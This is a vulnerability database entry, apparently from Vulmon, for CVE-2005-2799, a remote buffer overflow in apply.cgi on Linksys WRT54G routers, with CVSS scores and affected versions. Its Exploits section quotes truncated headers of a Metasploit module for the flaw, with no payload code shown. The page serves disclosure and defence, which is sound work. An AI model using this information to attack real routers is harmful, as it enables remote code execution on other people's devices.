7.5
CVSSv2

CVE-2005-2799

Published: 15/09/2005 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in apply.cgi in Linksys WRT54G 3.01.03, 3.03.6, and possibly other versions prior to 4.20.7, allows remote malicious users to execute arbitrary code via a long HTTP POST request.

Vulnerable Product Search on Vulmon Subscribe to Product

linksys wrt54g 3.01.3

linksys wrt54g 3.03.6

Exploits

## # $Id: linksys_apply_cgirb 10457 2010-09-24 16:55:38Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class ...
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys applycgi buffer overflow', 'Description' => %q{ This module exploits a stack overflow in applycgi on the Linksys WRT54G and WRT54GS route ...